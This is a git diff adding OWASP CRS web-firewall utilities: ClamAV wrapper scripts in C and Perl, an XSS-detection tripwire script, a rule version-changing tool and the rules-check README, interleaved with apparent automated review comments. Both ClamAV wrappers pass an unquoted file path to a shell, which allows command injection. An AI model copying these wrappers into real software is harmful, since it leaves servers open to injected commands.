+#include "common.h"
+
+main(int argc, char *argv[])
+{
+ char cmd[MAX_OUTPUT_SIZE];
+ char output[MAX_OUTPUT_SIZE];
+ int error;
+ char *colon;
+ char *keyword;
+
+ if (argc > 1) {
+ sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]);
+ output[0] = '\0';
+ error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);
+ if (error != 0) {
+ printf ("1 exec error %d: OK", error);
+ } else if (!*output) {
+ printf ("1 exec empty: OK");
+ }
+ else {
+ colon = strstr(output, ":");
+ if (colon) { colon += 2; }
+ if (!colon) {
+ printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd);
+ }
+ else if (keyword = strstr(colon, " FOUND")) {
+ *keyword = '\0';
+ printf ("0 clamscan: %s", colon);
+ }
+ else if (keyword = strstr(colon, " ERROR")) {
+ *keyword = '\0';
+ printf ("0 clamscan: %s", colon);
+ }
+ else if (keyword = strstr(colon, "OK")) {
+ printf ("1 clamscan: OK");
+ }
+ else if (keyword = strstr(colon, "Empty file")) {
+ printf ("1 empty file");
+ }
+ else if (keyword = strstr(colon, "Can't access file ")) {
+ printf ("0 invalid file %s", keyword+18);
+ }
+ else {
+ printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd);
+ }
+ }
+ }
+}
diff --git a/nginx/config/owasp-crs/util/av-scanning/runav.pl b/nginx/config/owasp-crs/util/av-scanning/runav.pl
new file mode 100755
index 00000000..c05fbf2a
--- /dev/null
+++ b/nginx/config/owasp-crs/util/av-scanning/runav.pl
@@ -0,0 +1,40 @@
+#!/usr/bin/perl
+#
+# runav.pl
+# Copyright (c) 2004-2011 Trustwave
+#
+# This script is an interface between ModSecurity and its
+# ability to intercept files being uploaded through the
+# web server, and ClamAV
+
+
+$CLAMSCAN = "clamscan";
+
+if ($#ARGV != 0) {
+ print "Usage: modsec-clamscan.pl \n";
+ exit;
+}
+
+my ($FILE) = shift @ARGV;
+
+$cmd = "$CLAMSCAN --stdout --disable-summary $FILE";
+$input = `$cmd`;
+$input =~ m/^(.+)/;
+$error_message = $1;
+
+$output = "0 Unable to parse clamscan output [$1]";
+
+if ($error_message =~ m/: Empty file\.?$/) {
+ $output = "1 empty file";
+}
+elsif ($error_message =~ m/: (.+) ERROR$/) {
+ $output = "0 clamscan: $1";
+}
+elsif ($error_message =~ m/: (.+) FOUND$/) {
+ $output = "0 clamscan: $1";
+}
+elsif ($error_message =~ m/: OK$/) {
+ $output = "1 clamscan: OK";
+}
+
+print "$output\n";
diff --git a/nginx/config/owasp-crs/util/browser-tools/js-overrides.js b/nginx/config/owasp-crs/util/browser-tools/js-overrides.js
new file mode 100644
index 00000000..34d50177
--- /dev/null
+++ b/nginx/config/owasp-crs/util/browser-tools/js-overrides.js
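Review bot: `$input = `$cmd`;` hands `$FILE` to /bin/sh unquoted, because `$cmd` is built purely by interpolation, so a path containing shell metacharacters is re-parsed as commands; ModSecurity normally passes its own temp-file name here, but the script is also run by hand, so invoke the scanner in list form through a pipe open, which never involves a shell. The script has no `use strict; use warnings;`, and the fallback `"0 Unable to parse clamscan output [$1]"` reads `$1` from a match that may not have succeeded (empty scanner output), where `$error_message` is the intended value. The usage line names `modsec-clamscan.pl` while the file is `runav.pl`; the argument placeholder after it appears lost in this rendering.
```perl
use strict;
use warnings;

my $CLAMSCAN = "clamscan";
# … unchanged: argument-count check …
my ($FILE) = shift @ARGV;

# list-form pipe open: no shell, so $FILE reaches the scanner as one argument
open my $scan, '-|', $CLAMSCAN, '--stdout', '--disable-summary', $FILE
    or do { print "0 clamscan: cannot run $CLAMSCAN: $!\n"; exit; };
my $input = do { local $/; <$scan> } // '';
close $scan;
my ($error_message) = $input =~ m/^(.+)/;
$error_message //= '';

my $output = "0 Unable to parse clamscan output [$error_message]";
# … unchanged: result classification and final print …
```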
@@ -0,0 +1,78 @@ +(function() { // don't leak XSSTripwire into global ns + + /* + Assumptions: + - we need to run first, before any other attacker script + - we can't prevent tripwire from being detected (e.g. by side effects) + Todo: + - a lot more in lockdown + - protect XHR + */ + var XSSTripwire = new Object(); + + XSSTripwire.report = function() { + // Notify server + var notify = XSSTripwire.newXHR(); + + // Create a results string to send back + var results; + try { + results = "HTML=" + encodeURIComponent(document.body.outerHTML); + } catch (e) {} // we don't always have document.body + + notify.open("POST", XSSTripwire.ReportURL, true); + notify.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); + notify.send(results); + } + + XSSTripwire.lockdown = function(obj, name) { + if (Object.defineProperty) { + Object.defineProperty(obj, name, { + configurable: false + }) + } + } + + XSSTripwire.newXHR = function() { + var xmlreq = false; + if (window.XMLHttpRequest) { + xmlreq = new XMLHttpRequest(); + } else if (window.ActiveXObject) { + // Try ActiveX + try { + xmlreq = new ActiveXObject("Msxml2.XMLHTTP"); + } catch (e1) { + // first method failed + try { + xmlreq = new ActiveXObject("Microsoft.XMLHTTP"); + } catch (e2) { + // both methods failed + } + } + } + return xmlreq; + }; + + XSSTripwire.proxy = function(obj, name, report_function_name, exec_original) { + var proxy = obj[name]; + obj[name] = function() { + // URL of the page to notify, in the event of a detected XSS event: + XSSTripwire.ReportURL = "xss-tripwire-report?function=" + encodeURIComponent(report_function_name); + + XSSTripwire.report(); + + if (exec_original) { + return proxy.apply(this, arguments); + } + }; + XSSTripwire.lockdown(obj, name); + }; + + XSSTripwire.proxy(window, 'alert', 'window.alert', true); + XSSTripwire.proxy(window, 'confirm', 'window.confirm', true); + XSSTripwire.proxy(window, 'prompt', 'window.prompt', true); + XSSTripwire.proxy(window, 'unescape', 
'unescape', true); + XSSTripwire.proxy(document, 'write', 'document.write', true); + XSSTripwire.proxy(String, 'fromCharCode', 'String.fromCharCode', true); + +})(); diff --git a/nginx/config/owasp-crs/util/change-version/README.md b/nginx/config/owasp-crs/util/change-version/README.md new file mode 100644 index 00000000..7867d311 --- /dev/null +++ b/nginx/config/owasp-crs/util/change-version/README.md 
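Review bot: `XSSTripwire.lockdown` only clears `configurable`; a data property such as `window.alert` keeps `writable: true`, so a later script can simply reassign `window.alert` and replace the proxy, which defeats the lockdown. Change the descriptor to `Object.defineProperty(obj, name, { configurable: false, writable: false })`; whether every host object here accepts that redefinition varies by browser, so it should be checked in the targets you support. `report()` leaves `results` undefined when `document.body` is absent and then posts an empty body — initialise it as `var results = "";` so the server still receives a well-formed form body. The `report` and `lockdown` assignments also lack the terminating `;` that `newXHR` and `proxy` have.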
@@ -0,0 +1,113 @@ +# Change version in CRS + +This page describes how can you change the version strings in CRS rules. + +## Goals + +The problem is change the version string in CRS rules isn't trivial. Version string used for mark all rule by the `ver` action, mark the whole file in a comment, or mark the rule set with `SecComponentSignature`. Few examples: + +* in a rule: `SecRule ARGS "foo" "id:1,phase:1,ver:'OWASP_CRS/3.3.0',pass"` +* comment: `# OWASP ModSecurity Core Rule Set ver.3.3.0` +* config directive: `SecComponentSignature "OWASP_CRS/3.3.0"` + +There are many other pattern which look-a-like version string, but that isn't it. + +The main task is replace only the real version strings by the new one. + +The Python script below helps to do that on the whole rule set or any unique file. + +## Prerequisites + +* Python3 interpreter +* [msc_pyparser](https://github.com/digitalwave/msc_pyparser) +* CRS rule set + +You can install the `msc_pyparser` through PIP - that's the recommended method, see the [instructions](https://github.com/digitalwave/msc_pyparser#installing-using-pip3). + +If you already have this package, don't forget to update it before you start the work: + +```bash +python3 -m pip install --upgrade msc_pyparser +``` + +## Usage + +The script expects three mandatory and one optional arguments: + +* input file or directory +* output **directory** +* version string for `ver` actions and `SecComponentSignature` - these are always the same +* and optionally, the version string for comments + +Please note that the input can be a single file (eg. 'coreruleset/rules/REQUEST-901-INITIALIZATION.conf' or a directory with meta name, eg 'coreruleset/rules/*.conf'. Also note that the output argument is always a **directory** where the script puts the transformed file or files. + +### Run the script + +Consider you want to change only the `ver` and `SecComponentSignature` values by a new one, eg: `OWASP_CRS/3.4.0-dev`. The current value is `OWASP_CRS/3.3.0`. 
The next command will solve this: + +```bash +mkdir /path/to/coreruleset/rules_new +$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" +Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf +... +Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf +``` + +The new files will placed under the `/path/to/coreruleset/rules_new`, now make a diff: + +```bash +$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done +28c28 +< SecComponentSignature "OWASP_CRS/3.3.0" +--- +> SecComponentSignature "OWASP_CRS/3.4.0-dev" +61c61 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +79c79 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +... +``` + +As you can see, the comments have been left untouched. + +In the next example, we can replace them too: + +```bash +$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" "3.4.0-dev" +Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf +... 
+Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf +``` + +Run the diff again: + +```bash +$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done +2c2 +< # OWASP ModSecurity Core Rule Set ver.3.3.0 +--- +> # OWASP ModSecurity Core Rule Set ver.3.4.0-dev +28c28 +< SecComponentSignature "OWASP_CRS/3.3.0" +--- +> SecComponentSignature "OWASP_CRS/3.4.0-dev" +61c61 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +79c79 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +... +``` + +As you can see, the version string at the end of comment line has changed in line 2. diff --git a/nginx/config/owasp-crs/util/change-version/README.txt b/nginx/config/owasp-crs/util/change-version/README.txt new file mode 100644 index 00000000..984a91c5 --- /dev/null +++ b/nginx/config/owasp-crs/util/change-version/README.txt 
@@ -0,0 +1,117 @@
+Change version in CRS
+=====================
+
+This page describes how can you change the version strings in CRS rules.
+
+
+Goals
+-----
+The problem is change the version string in CRS rules isn't trivial. Version
+string used for mark all rule by the ver action, mark the whole file in a
+comment, or mark the rule set with SecComponentSignature. Few examples:
+
+ * in a rule: SecRule ARGS "foo" "id:1,phase:1,ver:'OWASP_CRS/3.3.0',pass"
+ * comment: # OWASP ModSecurity Core Rule Set ver.3.3.0
+ * config directive: SecComponentSignature "OWASP_CRS/3.3.0"
+
+There are many other pattern which look-a-like version string, but that
+isn't it.
+
+The main task is replace only the real version strings by the new one.
+
+The Python script below helps to do that on the whole rule set or any unique
+file.
+
+Prerequisites
+-------------
+ * Python3 interpreter
+ * msc_pyparser
+ * CRS rule set
+
+You can install the msc_pyparser through PIP - that's the recommended method,
+see the instructions.
+
+If you already have this package, don't forget to update it before you start
+the work:
+
+python3 -m pip install --upgrade msc_pyparser
+
+
+Usage
+-----
+The script expects three mandatory and one optional arguments:
+
+* input file or directory
+* output directory
+* version string for ver actions and SecComponentSignature - these are always
+ the same and optionally, the version string for comments
+
+Please note that the input can be a single file (eg.
+'coreruleset/rules/REQUEST-901-INITIALIZATION.conf' or a directory with meta
+name, eg 'coreruleset/rules/*.conf'. Also note that the output argument is
+always a directory where the script puts the transformed file or files.
+
+Run the script
+--------------
+Consider you want to change only the ver and SecComponentSignature values by a
+new one, eg: OWASP_CRS/3.4.0-dev. The current value is OWASP_CRS/3.3.0. The
+next command will solve this:
+
+mkdir /path/to/coreruleset/rules_new
+$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev"
+Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf
+Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf
+...
+Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
+Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf
+
+The new files will placed under the /path/to/coreruleset/rules_new, now make a diff:
+
+$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done
+28c28
+< SecComponentSignature "OWASP_CRS/3.3.0"
+---
+> SecComponentSignature "OWASP_CRS/3.4.0-dev"
+61c61
+< ver:'OWASP_CRS/3.3.0',\
+---
+> ver:'OWASP_CRS/3.4.0-dev',\
+79c79
+< ver:'OWASP_CRS/3.3.0',\
+---
+> ver:'OWASP_CRS/3.4.0-dev',\
+...
+
+As you can see, the comments have been left untouched.
+
+In the next example, we can replace them too:
+
+$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" "3.4.0-dev"
+Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf
+Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf
+...
+Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
+Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf
+
+Run the diff again:
+
+$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done
+2c2
+< # OWASP ModSecurity Core Rule Set ver.3.3.0
+---
+> # OWASP ModSecurity Core Rule Set ver.3.4.0-dev
+28c28
+< SecComponentSignature "OWASP_CRS/3.3.0"
+---
+> SecComponentSignature "OWASP_CRS/3.4.0-dev"
+61c61
+< ver:'OWASP_CRS/3.3.0',\
+---
+> ver:'OWASP_CRS/3.4.0-dev',\
+79c79
+< ver:'OWASP_CRS/3.3.0',\
+---
+> ver:'OWASP_CRS/3.4.0-dev',\
+...
+
+As you can see, the version string at the end of comment line has changed in line 2.
diff --git a/nginx/config/owasp-crs/util/change-version/change-version.py b/nginx/config/owasp-crs/util/change-version/change-version.py
new file mode 100755
index 00000000..6e39a8e7
--- /dev/null
+++ b/nginx/config/owasp-crs/util/change-version/change-version.py
@@ -0,0 +1,105 @@
+#!/usr/bin/env python3
+
+import sys
+import glob
+import msc_pyparser
+import os.path
+import re
+
+class FileTransform(object):
+ def __init__(self, data):
+ self.data = data
+ self.cverpatt = "ver\.\d+\.\d+\.\d+$"
+ self.re_cverpatt = re.compile(self.cverpatt)
+
+ def change_version(self, version, cversion):
+ # iterate through AST items
+ # self.data: the parsed structure
+ for d in self.data:
+ # id the item has 'actions' then we can check the 'ver' key
+ if "actions" in d:
+ aidx = 0
+ while aidx < len(d['actions']):
+ a = d['actions'][aidx]
+ # if we found one, replace the value
+ if a['act_name'] == "ver":
+ a['act_arg'] = version
+ aidx += 1
+ else:
+ # replace SecComponentSignature by same version string
+ if d['type'].lower() == "seccomponentsignature":
+ d['arguments'][0]['argument'] = version
+
+ # replace the versions in comments if cversion exists
+ if cversion is not None:
+ if d['type'].lower() == "comment" and self.re_cverpatt.search(d['argument']):
+ d['argument'] = re.sub(self.cverpatt, "ver.%s" % (cversion), d['argument'])
+
+class FileHandler(object):
+ def __init__(self, **kwargs):
+ for key, value in kwargs.items():
+ setattr(self, key, value)
+ if not hasattr(self, 'cversion'):
+ self.cversion = None
+
+ self.output = self.output.rstrip("/") + "/"
+
+ # iterate through the list of files
+ for f in glob.glob(self.input):
+ print(f"Working with file: %s" % (f))
+ # read the file content
+ try:
+ with open(f) as file:
+ data = file.read()
+ except:
+ print("Exception caught - ", sys.exc_info())
+ sys.exit(1)
+
+ # build AST from content
+ try:
+ mparser = msc_pyparser.MSCParser()
+ mparser.parser.parse(data)
+ except:
+ print(sys.exc_info()[1])
+ sys.exit(1)
+
+ # change version and comment version if exists
+ try:
+ t = FileTransform(mparser.configlines)
+ t.change_version(self.version, self.cversion)
+ except:
+ print(sys.exc_info()[1])
+ sys.exit(1)
+
+ # save the new file
+ try:
+ mwriter = msc_pyparser.MSCWriter(mparser.configlines)
+ output = os.path.join(self.output, os.path.basename(f).lstrip("/"))
+ with open(output, "w") as file:
+ mwriter.generate()
+ # add extra new line at the end of file
+ mwriter.output.append("")
+ file.write("\n".join(mwriter.output))
+ except:
+ print("Exception caught - ", sys.exc_info())
+ sys.exit(1)
+
+if len(sys.argv) < 4:
+ print("Argument missing!")
+ print("Use: %s rule.conf /path/to/output/directory version" % sys.argv[0])
+ print(" %s \"/path/to/rules/*.conf\" /path/to/output/directory version [comment_version]" % sys.argv[0])
+ print("Example:")
+ print(" mkdir ../../rulestmp")
+ print(" %s \"../../rules/*.conf\" ../../rulestmp \"OWASP_CRS/3.4.0-dev\" \"3.4.0-dev\"" % sys.argv[0])
+ sys.exit(1)
+
+args = {
+ 'input' : sys.argv[1],
+ 'output' : sys.argv[2],
+ 'version' : sys.argv[3]
+}
+
+if len(sys.argv) > 4:
+ args['cversion'] = sys.argv[4]
+
+fh = FileHandler(**args)
diff --git a/nginx/config/owasp-crs/util/crs-rules-check/CHANGES b/nginx/config/owasp-crs/util/crs-rules-check/CHANGES
new file mode 100644
index 00000000..109d221f
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs-rules-check/CHANGES
@@ -0,0 +1,3 @@
+v0.1 - 2021-12-02
+-----------------
+ * Initial release
diff --git a/nginx/config/owasp-crs/util/crs-rules-check/README.md b/nginx/config/owasp-crs/util/crs-rules-check/README.md
new file mode 100644
index 00000000..404443e8
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs-rules-check/README.md
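Review bot: The four bare `except:` clauses in `FileHandler.__init__` (around the read, parse, transform and write steps of change-version.py) also catch `SystemExit` and `KeyboardInterrupt` and then discard the traceback, which makes a rule file that fails to parse hard to diagnose; narrow them to `except Exception as e:` and print `e`, or let the exception propagate. Two smaller points in the same hunk: `self.cverpatt = "ver\.\d+\.\d+\.\d+$"` is a non-raw string carrying `\.` and `\d` escapes and should be `r"ver\.\d+\.\d+\.\d+$"`, and `print(f"Working with file: %s" % (f))` mixes an f-string prefix with %-formatting and should be `print(f"Working with file: {f}")`. Also `glob.glob(self.input)` matching nothing makes the script exit 0 without writing any file, so a check that the glob produced at least one path, with a non-zero exit otherwise, would be worth adding before the loop.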
@@ -0,0 +1,416 @@
+crs_rules_check
+===============
+
+Welcome to the `crs_rules_check` documentation.
+
+Prerequisites
+=============
+
+To run the tool, you need:
+
++ a **Python 3** interpreter
++ **msc_pyparser** - a SecRule parser (>=1.2.1)
+
+`msc_pyparser` was written in Python 3 and has not been tested with Python 2, therefore you have to use Python 3.
+
+The best way to install the required packages just run
+
+```
+pip3 install -r requirements.txt
+```
+
+How does it work
+================
+
+The script expects an argument at least - this would be a single file or a file list, eg: `/path/to/coreruleset/*.conf`.
+
+First, an attempt is made to parse each file specified on the command line. This is a "pre-check", and runs on all files before the other tests.
+ * **Parsing check** - try to parse the structure, this is a syntax check
+ **note**: this script is a bit more strict than mod_security. There are some cases, where mod_security allows the syntax, but [msc_pyparser](https://github.com/digitalwave/msc_pyparser/) not.
+
+Second, the script loops over each of the parsed structures. Each iteration consists of the following steps:
+ * **Casing check** - checks operators, actions, transformations and ctl names for proper casing
+ e.g., `@beginsWith` is allowed, `@beginswith` is not. In this step, the script also ensures that an operator is present, eg `SecRule ARGS "^.*"` isn't allowed without `@rx` operator.
+ * **Action order check** - This step verifies that actions are specified in the correct order - [see the wiki](https://github.com/coreruleset/coreruleset/wiki/Order-of-ModSecurity-Actions-in-CRS-rules)
+ * **Format check** CRS has a good reference for [indentation](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/CONTRIBUTING.md#general-formatting-guidelines-for-rules-contributions) and other formatting. `msc_pyparser` follows these rules when it creates the config file(s) from parsed structure(s). After the re-build is done, it runs a compare between the original file and the built one with help of `difflib`. The script reports all non-compliant formatting.
+ **Note**, that `difflib` is a part of the standard Python library, you don't need to install it.
+ * **Deprecation check** - This step checks for use of deprecated features. The following features are deprecated:
+ * `ctl:auditLogParts` [is no longer supported by CRS](https://github.com/coreruleset/coreruleset/pull/3090)
+ * **Duplicate ID's check** - This step checks that each rule has a unique ID.
+ * **paranoia-level/N tag and its value** - This step checks that the `paranoia-level/N` tag is present when required and whether it has the correct value `N` for its context. Specifically:
+ * if a rule is activated for a specific paranoia level `L` and does not have the `nolog` action, the `paranoia-level/N` tag **must** be set and the value of `N` **must** be `L`
+ * if a rule is activated outside of any paranoia level, or has the `nolog` action, the `paranoia-level/N` tag **must not** be set
+ * **Anomaly scoring check** - This step checks that rules are configured properly for the anomaly scoring mechanism:
+ * every rule must update the correct scoring variable with the correct severity related score, for example: `setvar:inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}`
+ * every rule must update the correct scoring variable with the correct severity related score, for example: `setvar:inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}`
+ * **Initialization of used transaction (TX) variables** - all used TX variables **must** be initialised before their first use. Using a TX variable means one of the following:
+ * the variable is a target of a rule, e.g., `SecRule TX.foo ...`
+ * the variable is an operator argument, eg `SecRule ARGS "@rx %{TX.foo}"...`
+ * the variable is a right hand side operand in a `setvar` action, eg `setvar:tx.bar=%{tx.foo}`
+ * the variable is in an expansion, e.g., as part of the value of a `msg` action: `msg:'Current value of variable: %{tx.foo}`
+
+Finally, the script prints a report of all unused TX variables. Usually, unused TX variables occur when a rule creates a TX variable (e.g., `setvar:tx.foo=1`) but the value of the variable is never used anywhere else. This will only be revealed after the script has checked all rules.
+
+
+If script finds any parser error, it stops immediately. In case of other error, shows it (rule-by-rule). Finally, the script returns a non-zero value.
+
+If everything is fine, rule returns with 0.
+
+Normally, you should run the script:
+
+```
+./util/crs-rules-check/rules-check.py -r crs-setup.conf.example -r rules/*.conf
+```
+
+Optionally, you can add the option `--output=github` (default value is `native`):
+
+```
+./util/crs-rules-check/rules-check.py --output=github -r crs-setup.conf.example -r rules/*.conf
+```
+
+In this case, each line will have a prefix, which could be `::debug` or `::error`. See [this](https://docs.github.com/en/actions/using-workflows/workflow-commands-for-github-actions#setting-an-error-message).
+
+Examples
+========
+
+To run these samples, see the files in `examples` directory.
+
+### Test 1 - syntax check
+
+```
+SecRule &ARGS_GET "@eq 3" \
+ "id:1,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ chain
+ SecRule ARGS_GET:foo "@rx bar" \
+ "t:none,t:urlDecodeUni,t:lowercase,\
+ setvar:'tx.some_vars=1'
+```
+
+As you can see, there are two `"` missing above: the first one after the `chain`, and the other one from the end of the chained rule. Mod_security allows this, but this isn't well formed. (See [#2184](https://github.com/coreruleset/coreruleset/pull/2184))
+
+Check it:
+
+```
+$ ./rules-check.py -r examples/test1.conf
+Config file: examples/test1.conf
+Can't parse config file: examples/test1.conf
+ file=examples/test1.conf, line=8, endLine=8, title=Parser error: can't parse file
+$ echo $?
+1
+```
+
+### Test 2 - case sensitive test
+
+```
+SecRule REQUEST_URI "@beginswith /index.php" \
+ "id:1,\
+ phase:1,\
+ deny,\
+ t:none,\
+ nolog"
+```
+
+In this rule the operator is lowercase. Mod_security allows both form.
+
+```
+$ ./rules-check.py -r examples/test2.conf
+Config file: examples/test2.conf
+ Parsing ok.
+ Ignore case check found error(s)
+ file=examples/test2.conf, line=1, endLine=1, title=Case check: Operator case mismatch: @beginswith (rule: 1)
+ Action order check ok.
+ Indentation check ok.
+$ echo $?
+1
+```
+
+### Test 3 - wrong action ordering
+
+```
+SecRule REQUEST_URI "@beginsWith /index.php" \
+ "phase:1,\
+ id:1,\
+ deny,\
+ t:none,\
+ nolog"
+```
+
+In this rule, the `phase` and `id` are interchanged. As [documentation](https://github.com/coreruleset/coreruleset/wiki/Order-of-ModSecurity-Actions-in-CRS-rules) says, the first action **must** be the `id`, the second one is the `phase`.
+
+```
+$ ./rules-check.py -r examples/test3.conf
+Config file: examples/test3.conf
+ Parsing ok.
+ Ignore case check ok.
+ Action order check found error(s)
+ file=examples/test3.conf, line=3, endLine=3, title=Action order check: action 'phase' at pos 0 is wrong place against 'id' at pos 1 (rule: 1)
+ Indentation check ok.
+$ echo $?
+1
+```
+
+### Test 4 - wrong indentation
+
+```
+ SecRule ARGS "@rx foo" \
+ "id:1,\
+ phase:1,\
+ pass,\
+ nolog"
+
+SecRule ARGS "@rx foo" \
+ "id:2,\
+ phase:1,\
+ pass,\
+ nolog"
+
+SecRule ARGS "@rx foo" \
+ "id:3,\
+ phase:1,\
+ pass,\
+ nolog"
+```
+
+In this rule set, the first line and the rule with `id:3` first action have an extra leading space. As [documentation](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/CONTRIBUTING.md#general-formatting-guidelines-for-rules-contributions) describes, CRS has a strict indentation rules. The script checks the indentation with help of Python's [difflib](https://docs.python.org/3.9/library/difflib.html).
+
+```
+$ ./rules-check.py -r examples/test4.conf
+Config file: examples/test4.conf
+ Parsing ok.
+ Ignore case check ok.
+ Action order check ok.
+ Indentation check found error(s)
+---
++++
+ file=examples/test4.conf, line=1, endLine=6, title=Indentation error: an indetation error has found
+@@ -1,5 +1,5 @@
+- SecRule ARGS "@rx foo" \
+- "id:1,\
++SecRule ARGS "@rx foo" \
++ "id:1,\
+ phase:1,\
+ pass,\
+ nolog"
+ file=examples/test4.conf, line=11, endLine=18, title=Indentation error: an indetation error has found
+@@ -11,7 +11,7 @@
+ nolog"
+
+ SecRule ARGS "@rx foo" \
+- "id:3,\
++ "id:3,\
+ phase:1,\
+ pass,\
+ nolog"
+```
+
+### Test 5 - empty (implicit @rx) operator
+
+```
+SecRule REQUEST_URI "index.php" \
+ "phase:1,\
+ id:1,\
+ deny,\
+ t:none,\
+ nolog"
+```
+
+In this rule, the operator is missing. As [ModSecurity documentation](https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-(v2.x)#rx) says "the rules that do not explicitly specify an operator default to @rx". In CRS, this isn't allowed.
+
+```
+$ ./rules-check.py -r examples/test5.conf
+Config file: examples/test5.conf
+ Parsing ok.
+ Ignore case check found error(s)
+ file=examples/test5.conf, line=1, endLine=1, title=Case check: Empty operator isn't allowed (rule: 1)
+ Action order check ok.
+ Indentation check ok.
+$ echo $?
+1
+```
+
+### Test 6 - check that rule does not contain 'ctl:auditLogParts'
+
+```
+SecRule TX:sql_error_match "@eq 1" \
+ "id:1,\
+ phase:4,\
+ block,\
+ capture,\
+ t:none,\
+ ctl:auditLogParts=+E"
+```
+
+The `ctl:auditLogParts=+E` (or any kind of `ctl:auditLogParts`) is not allowed in CRS.
+
+See the CRS PR [#3034](https://github.com/coreruleset/coreruleset/pull/3034)
+
+```
+$ util/crs-rules-check/rules-check.py -r util/crs-rules-check/examples/test6.conf
+Config file: util/crs-rules-check/examples/test6.conf
+ Parsing ok.
+ Ignore case check ok.
+ Action order check ok.
+ Indentation check ok.
+ Found 'ctl:auditLogParts' action is in wrong place.
+ file=util/crs-rules-check/examples/test6.conf, line=7, endLine=7, title='ctl:auditLogParts' action in wrong place: action can only be placed in last part of a chained rule (rule: 1)
+$ echo $?
+1
+```
+
+### Test 7 - check duplicate id's
+
+```
+SecRule ARGS "@rx foo" \
+ "id:1001,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none"
+
+SecRule ARGS_NAMES "@rx bar" \
+ "id:1001,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none"
+```
+
+In this rule file, there are two rules with same `id`.
+
+```
+$ util/crs-rules-check/rules-check.py -r util/crs-rules-check/examples/test7.conf
+Config file: util/crs-rules-check/examples/test7.conf
+ Parsing ok.
+Checking parsed rules...
+util/crs-rules-check/examples/test7.conf
+ Ignore case check ok.
+ Action order check ok.
+ Indentation check ok.
+ 'ctl:auditLogParts' actions are in right place.
+ Found duplicated id('s)
+ file=util/crs-rules-check/examples/test7.conf, line=10, endLine=10, title='id' is duplicated: id 1001 is duplicated, previous place: util/crs-rules-check/examples/test7.conf:3
+ paranoia-level tags are correct.
+ PL anomaly_scores are correct.
+ All TX variables are set
+End of checking parsed rules
+$ echo $?
+1
+```
+
+### Test 8 - paranoia-level consitency check
+
+```
+SecRule &TX:blocking_paranoia_level "@eq 0" \
+ "id:901120,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc1',\
+ setvar:'tx.blocking_paranoia_level=1'"
+
+SecRule &TX:detection_paranoia_level "@eq 0" \
+ "id:901125,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc1',\
+ setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'"
+
+SecRule &TX:error_anomaly_score "@eq 0" \
+ "id:901141,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc1',\
+ setvar:'tx.error_anomaly_score=4'"
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
